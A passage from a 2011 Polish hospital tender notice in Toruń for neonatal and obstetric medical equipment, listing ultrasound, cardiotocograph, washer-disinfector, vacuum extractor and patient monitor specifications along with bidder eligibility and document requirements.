10	Tryb Duplex (Jednoczesne wyświetlanie na ekranie dwóch ruchomych obrazów w czasie rzeczywistym typu B i B/Cd)<br>
11	Tryb Triplex (B+PWD+CD/PD)<br>
12	Maksymalna szybkość odświeżania dla obrazu 2D min 750 Hz<br>
13	Maksymalna szybkość odświeżania dla obrazu CD min 300 Hz<br>
III	Oprogramowanie oraz funkcje pomiarowe i użytkowe<br>
1	Badania przezciemieniowe u noworodków<br>
Badania jamy brzusznej u noworodków<br>
Badania naczyniowe<br>
Badania kardiologiczne u noworodków<br>
2	Możliwość podziału ekranu 2D/PW w pionie i poziomie<br>
3	Oprogramowanie do pomiarów i obliczeń dla badań dopplerowskich z możliwością tworzenia własnych formuł obliczeniowych<br>
4	Pomiar odległości min. 7 pomiarów<br>
5	Pomiar obwodu, pola powierzchni, objętości przepływu<br>
6	Powiększenie obrazu w czasie rzeczywistym min. x 8<br>
7	Powiększenie obrazu zamrożonego min. x 8<br>
8	Funkcja automatycznej optymalizacji obrazu 2D przy pomocy jednego klawisza<br>
9	Funkcja automatycznej optymalizacji widma dopplerowskiego przy pomocy jednego klawisza (min. Automatyczny przesuw linii bazowej i dopasowanie skali)<br>
10	Automatyczny obrys spektrum i jednoczesne wyznaczanie parametrów przepływu min. 6 w czasie rzeczywistym na ruchomym spektrum<br>
11	Automatyczna optymalizacja częstotliwości Color Dopplera w zależności od głębokiego obrazowania z wyświetlaniem aktualnej częstotliwości<br>
12	Automatyczny obrys spektrum i jednoczesne wyznaczanie parametrów przepływu na zatrzymanym spektrum<br>
13	Funkcja zdefiniowania nowych pomiarów i równań dla oferowanych aplikacji<br>
IV	Głowice ultradźwiękowe<br>
1.	Liniowa<br>
1.1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 4-12 MHz<br>
1.2	Pole widzenia min. 37 +/- 3 mm<br>
2.	Sektorowa kardiologiczna noworodkowa<br>
2.1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 5-12 MHz<br>
2.2	Kąt widzenia min. 90°<br>
2.3	Szerokopasmowa o zakresie częstotliwości nie węższym niż 3-8 MHz<br>
2.4	Kąt widzenia min. 90°<br>
V	Mikrokonweks pediatryczny<br>
1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 5-8 MHz<br>
2	Kąt widzenia min. 90°<br>
VI	System archiwizacji<br>
1	Videodrukarka czarno-biała<br>
2	Wewnętrzny twardy dysk o pojemności min. 120 GB<br>
3	Wbudowany w aparat układ cyfrowej archiwizacji na dyskach DVD CD-RW<br>
4	Archiwizacja nieruchomych obrazów na wewnętrznym dysku w standardach Windows, np. BMP, JPG, TIFF.<br>
5	Archiwizacja ruchomych obrazów na wewnętrznym dysku twardym w standardach Windows, np. AVI.<br>
6	Raporty do każdego rodzaju i trybu badania z możliwością dołączenia obrazów<br>
7	Interfejs sieciowy do transmisji obrazów i danych w sieci komputerowej wg standardu DICOM 3.0, min. DICOM print, store, worklist, raporty strukturalne<br>
8	Możliwość podpięcia dysku zewnętrznego przy pomocy magistrali USB w wersji minimum 2.0 w celu archiwizacji ruchomych obrazów<br>
VII	Możliwość rozbudowy systemu na dzień składania ofert<br>
1	Obrazowanie trójwymiarowe w czasie rzeczywistym z głowic wolumetrycznych z maks. prędkością min. 30 vps z możliwością dalszej obróbki bezpośrednio na aparacie<br>
2	Oprogramowanie do wyświetlania panoramicznego z możliwością wykonywania pomiarów<br>
VIII	Inne wymagania<br>
1	Gwarancja, min. 36 miesiące<br>                                                
2	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
3	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>  
4	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
5	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
6	Bezpłatna instalacja urządzenia<br> 
7	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
8	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0, 33.19.10.00-5, 33.19.51.00-4, 33.10.00.00-1, 33.11.22.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku posiadania uprawnień do wykonywania określonej działalności lub czynności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku posiadania wiedzy i doświadczenia Wykonawca zobowiązany jest załączyć do oferty:<br>
a/ wykaz wykonanych min. 2 dostaw sprzętu medycznego o wartości min. dla poszczególnych zadań:<br>
- Zadanie Nr 1 -     32.100,00 zł,<br>
- Zadanie Nr 2 -     22.800,00 zł,<br>
- Zadanie Nr 3 -       4.500,00 zł,<br>
- Zadanie Nr 4 -       8.000,00 zł,<br>
- Zadanie Nr 5 -     32.300,00 zł,<br>
- Zadanie Nr 6 -     55.600,00 zł,<br>
- Zadanie Nr 7 -     14.700,00 zł,<br>
- Zadanie Nr 8 -   125.000,00 zł
brutto każda dostawa w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;<br>
Wykonawca składający ofertę na Zadanie Nr 1 i Nr 2 musi wykazać się zrealizowanymi 2 dostawami o wymaganej wartości łącznej równej sumie tych zadań, tj. 54.900,00 zł każda dostawa.<br>
Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca zobowiązany jest załączyć do oferty:<br>
a/ informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty dla poszczególnych zadań:<br>
- Zadanie Nr 1 -     24.000,00 zł,<br>
- Zadanie Nr 2 -     17.100,00 zł,<br>
- Zadanie Nr 3 -       3.400,00 zł,<br>
- Zadanie Nr 4 -       6.000,00 zł,<br>
- Zadanie Nr 5 -     24.200,00 zł,<br>
- Zadanie Nr 6 -     42.000,00 zł,<br>
- Zadanie Nr 7 -     11.000,00 zł,<br>
- Zadanie Nr 8 -     93.600,00 zł,<br>
wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;<br>
/Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku udziału/.<br>
Wykonawca składający ofertę na kilka zadań musi załączyć do oferty informację banku lub spółdzielczej kasy oszczędnościowo- kredytowej o wymaganej wartości łącznej równej sumie poszczególnych zadań, których dotyczy oferta.<br>
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy do oferty załączyć:<br> 
a/ 	zgłoszenie do Prezesa Urzędu Rejestracji Wyrobów Medycznych potwierdzające, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679) lub aktualny certyfikat zgodności wyrobu z wymaganiami zasadniczymi.<br> 
b/ foldery, katalogi/ prospekty oferowanych wyrobów potwierdzające spełnianie parametrów wymaganych przez Zamawiającego - dotyczy zadań Nr 1, 2, 3, 4, 5 i 8.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br>
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.<br>
Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera ul. Św. Józefa 53/59, 87- 100 Toruń - pokój Nr 2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane w ramach projektu nr PL 0481 pn. /Zdrowa matka - zdrowy noworodek. Kompleksowy program opieki perinatalnej w Wojewódzkim Szpitalu Zespolonym w Toruniu/.<br>
Finansowanie w 85% z Mechanizmu Finansowania EOG i w 15% z budżetu Samorządu Województwa Kujawsko- Pomorskiego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa 3 szt. kardiotokografów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 - dostawa 3 szt. kardiotokografów, tj.:<br>
1. Kolorowy ekran dotykowy TFT pochylany o przekątnej większej lub równej 6,5 cala<br>
2. Metoda pomiarowa  Cardio, ultradźwiękowy Doppler pulsacyjny<br>
3. Zakres pomiarowy US 50 ÷240 bpm<br> 
4. Nieinwazyjne monitorowanie i rejestracja czynności serca płodu<br>
5. Częstotliwość pracy mniejsza lub równa 1,2  MHz<br>
6. Wartość natężenie emitowanej fali US mniejsze lub równe 2,4  mW/cm2<br>
7. Wskaźnik jakości sygnału<br>
8. Znacznik dla personelu<br>
9. Ręczny znacznik ruchów płodu dla matki<br>
10. Automatyczne monitorowanie ruchów płodu<br>
11. Czasownik NST<br>
12. Ustawiane zakresy alarmów FHR dla bradykardii i tachykardii od 60÷210 bpm
Zakresy ustawiane krokiem 10 bpm<br>
13. Zakresy opóźnień występowania alarmów dla bradykardii, tachykardii i utraty sygnału,  
Zakresy ustawiane krokiem 10 sekundowym 10÷300 sekund<br>
14. Prezentacja cyfrowej wartości FHR i Toco<br>
15. Na wyposażeniu aparatu przetwornik Toco 1 szt. i przetwornik Cardio - 1 szt.<br>
16. Wodoszczelność przetworników - minimum IP50. Podać oznaczenie IP<br>
17. Jednakowe głowice we wszystkich oferowanych urządzeniach. Możliwość przenoszenia głowic pomiędzy aparatami.<br>
18. Możliwość monitorowania bliźniaków<br>
19. Przesunięcie ( separacja zapisów) w przypadku ciąży bliźniaczej z informacją o włączeniu funkcji. Możliwość włączenia i wyłączenia funkcji<br>
20. Możliwość rozbudowy o monitorowanie trojaczków<br> 
21. Możliwość rozbudowy o analizę zapisu KTG<br>
22. Metoda pomiarowa Toco<br> 
23. Nieinwazyjne monitorowanie i rejestracja czynności skurczowej macicy<br>
24. Zakres sygnałów min. 0÷125<br>
25. Ustawienie linii podstawowej min. 20 jednostek<br>
26. Automatyczna korekcja offsetu<br>
27. Automatyczna korekcja zerowania<br>
28. Monitorowanie tętna matki<br> 
29. Wodoszczelne oraz proste do utrzymania w czystości przetworniki Cardio i Toco posiadające identyfikację w postaci optycznego elementu sygnałowego<br>
30. Praca samodzielna lub w systemie nadzoru położniczego<br>
31. Możliwość współpracy z telemetrią płodową<br>
32. Możliwość monitorowania NIBP matki<br>
33. Graficzny rejestrator termiczny wbudowany w urządzenie<br>
34. Standardowe prędkości przesuwania papieru 1,2 i 3 cm/min.<br>
35. Duże prędkości zapisu (zapisy archiwalne)<br>
36. Wprowadzanie (drukowanie) notatek tekstowych<br>
37. Wprowadzanie danych demograficznych pacjentki w KTG (ekranowa klawiatura w układzie QWERTY)<br>
38. Rozdzielczość  8 punktów/ mm 200 dpi<br>
39. Alarm końca papieru<br>
40. Kompaktowa obudowa<br>
41. Wózek pod monitor płodu<br>
42. Okres gwarancji - min 24 miesiące<br>
43. Czas reakcji serwis - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br> 
44. Gwarancja zapewnienia zakupu części zamiennych  przez okres 10 lat.<br>
45. Bezpłatne  szkolenie  pracowników Zamawiającego obsługujących urządzenie<br> 
46. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>
47.Aparat  zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br> 
48. Bezpłatna instalacja urządzenia<br> 
49. Instrukcja obsługi i karta gwarancyjna w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.32.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 2 szt. myjni-dezynfektorów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 2 - dostawa 2 szt. myjni-dezynfektorów, tj.:<br>
1 Urządzenie przeznaczone do opróżniania, mycia,  dezynfekcji i suszenia basenów, kaczek, pojemników na mocz, misek do mycia chorych i innego sprzętu pomocniczego.<br>
2 Model stojący  na posadzce wykonany ze stali nierdzewnej.<br>
3 Dezynfekcja termiczna zgodnie z normą EN ISO 15883-3<br>
4 Zbiornik na wodę ze stali nierdzewnej zintegrowany - zespolony z własną wytwornicą pary<br>
5 Komora mycia ze stali nierdzewnej, głęboko tłoczona, bez spoin z nachyleniem sufitu<br>
6 Minimalna pojemność komory dla uchwytu standardowego: 1 basen z pokrywką i 1 kaczka lub 3 kaczki. Możliwość wymiany i stosowania uchwytów specjalistycznych<br>
7 Drzwi uchylne, na przedniej ścianie urządzenia, otwierane i zamykane ręcznie bez oporów przy zamykaniu i otwieraniu<br>
8 System  dysz strumieniowych zapewniający dużą efektywność czyszczenia, niezależnie od zmian ciśnienia wody zasilającej. Minimum 10 dysz w tym rotacyjna<br>
9 Brak przecieków pary wodnej przez drzwi komory.<br>                           
10 Wewnętrzna automatyczna dezynfekcja termiczna wszystkich rur doprowadzających wodę oraz dysz strumieniowych<br>            
11 Mikrokomputerowe sterowanie pracą urządzenia<br>                   
12 Ergonomiczny ekran wyświetlający  informacje niezbędne do obsługi i kontroli urządzenia w języku polskim<br>                        
13 Optyczne i akustyczne informacje  o usterkach<br>
14 Programy dla mniej i bardziej zabrudzonych przedmiotów, poddawanych procesowi mycia i dezynfekcji. Minimum 3 programy standardowe<br>                            
15 Preferowane maksymalne wymiary zewnętrzne<br>
* Szerokość : 500 mm.<br>                                  
* Głębokość : 500 mm.<br>                                           
* Wysokość : 1800 mm<br>
16 Urządzenie wyposażone w opcję schładzania i suszenia, tzn. po zakończonym cyklu mycia, dezynfekcji i suszenia naczynia sanitarne poddawane temu procesowi muszą być schłodzone, suche, bez skroplin wody na powierzchni i wewnątrz naczyń<br>
17 Maksymalne zużycie wody na cykl do 25l/cykl<br>                                               
18 Maksymalny poziom wytwarzanego hałasu.  max 50 dB<br>  
19 Zasilanie z 3-fazowej sieci elektroenergetycznej  3 x 400 VAC 50 Hz.<br>
20 Podłączenie zimnej i ciepłej wody ? cala<br>
21 Podłączenie odpływu ścienne lub podłogowe 100 ?<br>                              
22 Gwarancja, min. 24 miesiące<br>                                   
23 Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
24 Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez  użytkownika<br>  
25 Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
26 Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
27 Bezpłatna instalacja urządzenia<br> 
28 Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
29 Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
30 Dostawa pakietu startowego: wymagane środki chemiczne 
Kanister 5L, podsuwacze plastikowe 5 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3 - dostawa 1 szt. vacuum extractora..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 3 - dostawa 1 szt. vacuum extractora, tj.<br>
1. Urządzenie gwarantujące bezpieczne wykonanie vacuum extrakcji noworodka oraz opcjonalnie przystosowane do użytkowania jako ssak.<br>
2. Zasilanie 230 VAC 50 Hz+/-10%<br>
3. Podciśnienie max.85 kPa<br>
4. Maksymalna wydajność ( mierzona w zakresie pracy za zbiornikiem na wydzieliny): nie mniejsza niż 30l/min i nie większa niż 35l/min<br>
5. Możliwość precyzyjnego ustawienia podciśnienia za pomocą regulatora membranowego<br>
6. Wielostopniowe zabezpieczenie przed przelaniem - zaoferować zbiornik zabezpieczający 0,25-0,5 litra<br>
7. Przystosowany do pracy ciągłej 24h/dobę<br> 
8. Pompa niskoobrotowa (do 100 obr/min) tłokowa, wytwarzająca podciśnienie bezolejowa, nie wymagająca konserwacji<br> 
9. Cicha praca max. 42 dB<br>
10. Urządzenie na stojaku jezdnym na czterech kołach (dwa z blokadami)<br>
11. Wersja AP umożliwiająca pracę w atmosferze stężonych gazów anestetycznych<br>
12. Zbiornik 1 litrowy wielorazowy z polisulfonianu na wydzielinę, nietłukący z tworzywa z podziałką, do sterylizacji w temperaturze do 134 stopni C<br>
13. Pelota położnicza silikonowa wielorazowa autoklawowalna rozmiar 50 i 60 mm<br>
14. Nożny regulator podciśnienia<br> 
15. Włącznik /wyłącznik nożny zintegrowany ze stojakiem<br>
16. Filtry antybakteryjne - min. 5 szt.<br>
17. Dren silikonowy wielorazowy autoklawowalny - min. 4 m<br>
18. Uchwyt na dren<br>
19. Gwarancja, min. 36  miesiące<br>                                                
20. Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
21. Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez  użytkownika<br>  
22. Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
23. Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
24. Bezpłatna instalacja urządzenia<br> 
25. Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
26. Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie Nr 4 - dostawa 2 szt. monitorów czynności życiowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 4 - dostawa 2 szt. monitorów czynności życiowych, tj.:<br>
1	Zasilanie:<br>
- sieciowe (230V,50Hz) i z akumulatora<br>
- możliwość automatycznego ładowania akumulatora z sieci<br>
- alarmy stanu rozładowania<br>
- czas pracy przy zasilaniu akumulatorowym min. 1,5 godz.<br>
- łatwa wymiana akumulatorów przez użytkownika, bez rozkręcania monitora<br>
PARAMETRY MONITOROWANE<br>
2	EKG<br>
3	Impedancja wejściowa >2 Megaomów<br>
4	Zakres częstości akcji serca: min:15-250/min<br>
5	Możliwość jednoczesnej prezentacji min. 7 kanałów EKG<br>
6	Min. 3 prędkości kreślenia: 12.5, 25, 50 mm/sek.<br>
7	Obwód zabezpieczony przed defibrylacją (min.5kV)<br>
8	Wzmocnienie:<br> 
x0,25; x0,5; x1; x2; x4 i Auto<br>
9	Wyświetlane odprowadzenia: I, II, III, aVR, aVL, aVF, V.<br>
10	Alarmy<br>
